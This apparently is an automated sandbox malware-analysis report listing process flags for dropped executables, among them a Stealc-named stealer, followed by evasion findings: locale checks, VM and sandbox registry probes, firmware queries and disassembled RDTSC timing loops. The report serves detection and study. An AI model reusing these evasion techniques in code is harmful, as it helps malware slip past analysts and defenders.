Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_7-82205

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 130F00B
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 12D9A3F
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 12E12C0
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 114A544
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 15DCF4A
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 1581707
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 1663D3E

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF1F4 second address: 7AEA9D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1ECFCB296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FA1ECFCB29Ch 0x00000010 jnc 00007FA1ECFCB296h 0x00000016 popad 0x00000017 nop 0x00000018 jp 00007FA1ECFCB29Ch 0x0000001e mov dword ptr [ebp+122D34C7h], ecx 0x00000024 push dword ptr [ebp+122D0491h] 0x0000002a xor dword ptr [ebp+122D2F94h], eax 0x00000030 call dword ptr [ebp+122D34CFh] 0x00000036 pushad 0x00000037 jnc 00007FA1ECFCB2ACh 0x0000003d xor eax, eax 0x0000003f sub dword ptr [ebp+122D3052h], esi 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 mov dword ptr [ebp+122D3052h], eax 0x0000004f mov dword ptr [ebp+122D38FBh], eax 0x00000055 mov dword ptr [ebp+122D3052h], ecx 0x0000005b mov esi, 0000003Ch 0x00000060 jg 00007FA1ECFCB29Ch 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a jg 00007FA1ECFCB2ABh 0x00000070 lodsw 0x00000072 cmc 0x00000073 add eax, dword ptr [esp+24h] 0x00000077 stc 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c cmc 0x0000007d nop 0x0000007e pushad 0x0000007f pushad 0x00000080 jbe 00007FA1ECFCB296h 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AEA9D second address: 7AEAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AEAA5 second address: 7AEAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FA1ECFCB296h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AEAB6 second address: 7AEABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AEABA second address: 7AEAC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92530C second address: 925316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA1ED006906h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 925316 second address: 92531A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92531A second address: 92532C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA1ED00690Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92532C second address: 92534A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA1ECFCB296h 0x00000009 jmp 00007FA1ECFCB2A3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9255AF second address: 9255BF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA1ED006906h 0x00000008 jc 00007FA1ED006906h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9255BF second address: 9255C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9255C5 second address: 9255CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA1ED006906h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9255CF second address: 9255F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1ECFCB2A2h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9255F7 second address: 9255FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9255FB second address: 925663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ECFCB2A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f jmp 00007FA1ECFCB2A5h 0x00000014 pop edx 0x00000015 pushad 0x00000016 jno 00007FA1ECFCB296h 0x0000001c pushad 0x0000001d popad 0x0000001e jc 00007FA1ECFCB296h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 pushad 0x00000028 jmp 00007FA1ECFCB2A5h 0x0000002d pushad 0x0000002e popad 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9257B9 second address: 9257E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FA1ED006910h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA1ED00690Fh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9257E3 second address: 9257E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9257E9 second address: 9257EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9257EF second address: 92580A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92580A second address: 92580E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 925AE5 second address: 925AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 928135 second address: 7AEA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 add dword ptr [esp], 47592A2Fh 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FA1ED006908h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub ecx, dword ptr [ebp+122D37EFh] 0x0000002d push dword ptr [ebp+122D0491h] 0x00000033 mov dword ptr [ebp+1244C4D4h], ecx 0x00000039 call dword ptr [ebp+122D34CFh] 0x0000003f pushad 0x00000040 jnc 00007FA1ED00691Ch 0x00000046 xor eax, eax 0x00000048 sub dword ptr [ebp+122D3052h], esi 0x0000004e mov edx, dword ptr [esp+28h] 0x00000052 mov dword ptr [ebp+122D3052h], eax 0x00000058 mov dword ptr [ebp+122D38FBh], eax 0x0000005e mov dword ptr [ebp+122D3052h], ecx 0x00000064 mov esi, 0000003Ch 0x00000069 jg 00007FA1ED00690Ch 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 jg 00007FA1ED00691Bh 0x00000079 lodsw 0x0000007b cmc 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 stc 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 cmc 0x00000086 nop 0x00000087 pushad 0x00000088 pushad 0x00000089 jbe 00007FA1ED006906h 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 928251 second address: 928291 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1ECFCB298h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 2CAAD2AAh 0x00000013 mov esi, dword ptr [ebp+122D30AAh] 0x00000019 mov edi, dword ptr [ebp+122D3663h] 0x0000001f lea ebx, dword ptr [ebp+1244D085h] 0x00000025 sub edx, 4743EB30h 0x0000002b xchg eax, ebx 0x0000002c push ecx 0x0000002d jmp 00007FA1ECFCB29Bh 0x00000032 pop ecx 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 pushad 0x00000038 popad 0x00000039 pop eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 928300 second address: 928380 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1ED006916h 0x0000000b popad 0x0000000c add dword ptr [esp], 40F39D3Ah 0x00000013 jmp 00007FA1ED00690Eh 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c stc 0x0000001d push 00000003h 0x0000001f mov dword ptr [ebp+122D300Ch], ecx 0x00000025 push A40BE094h 0x0000002a jo 00007FA1ED00691Eh 0x00000030 push eax 0x00000031 jmp 00007FA1ED006916h 0x00000036 pop eax 0x00000037 xor dword ptr [esp], 640BE094h 0x0000003e or dword ptr [ebp+122D2F94h], edi 0x00000044 lea ebx, dword ptr [ebp+1244D08Eh] 0x0000004a or edi, 7B9F71F6h 0x00000050 xchg eax, ebx 0x00000051 push ebx 0x00000052 push ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
